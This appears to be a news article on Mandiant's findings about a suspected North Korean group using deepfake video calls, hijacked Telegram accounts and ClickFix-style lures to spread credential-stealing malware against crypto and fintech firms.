Google Cloud’s cybersecurity unit Mandiant has identified an expanded malware campaign linked to suspected North Korean threat actors targeting cryptocurrency and fintech companies. The operation, attributed to a cluster tracked as UNC1069, involves advanced social engineering tactics and the deployment of multiple malware families designed to extract sensitive data and digital assets.
According to Mandiant, the latest campaign deployed seven distinct malware strains, including newly identified tools named SILENCELIFT, DEEPBREATH, and CHROMEPUSH. The firm said the attackers used compromised Telegram accounts and staged Zoom meetings featuring AI-generated deepfake videos to lure victims into executing malicious commands. The approach reflects an escalation in both technical sophistication and operational scale.
AI-enabled Intrusion Tactics
Mandiant said the group has been active since at least 2018, but recent artificial intelligence tools have allowed it to broaden and automate elements of its social engineering playbook. In November 2025, investigators observed the first use of AI-enabled lures in active operations, including fabricated video calls designed to build credibility with targets.
In one documented case, attackers used a compromised Telegram account belonging to a crypto founder to arrange a virtual meeting. During the call, the perpetrator claimed to be experiencing audio issues and directed the victim to run troubleshooting commands. Hidden within those instructions was a command that initiated the infection chain, a tactic known as a ClickFix attack.
The newly discovered malware strains are engineered to bypass core operating system protections and harvest browser data, authentication credentials, and other sensitive information. Mandiant said the campaign primarily targeted crypto exchanges, software developers, and venture capital firms with exposure to digital assets.
Institutional Risk and Geopolitical Backdrop
The findings underscore ongoing cybersecurity risks facing the digital asset sector, particularly as crypto firms handle large volumes of capital with relatively lean security teams. North Korea-linked actors have been repeatedly accused by US and allied authorities of using cybercrime to generate revenue amid international sanctions.
High-profile incidents in recent years, including large-scale exchange hacks and infiltration of crypto startups by fraudulent developers, have heightened institutional scrutiny. Security experts say the integration of AI into phishing and impersonation campaigns lowers operational barriers and increases the potential attack surface.
For institutional investors and infrastructure providers, the report reinforces the need for enhanced identity verification, endpoint monitoring and employee training. As digital asset markets mature and attract more traditional financial participants, cybersecurity remains a critical pillar of operational resilience and regulatory confidence.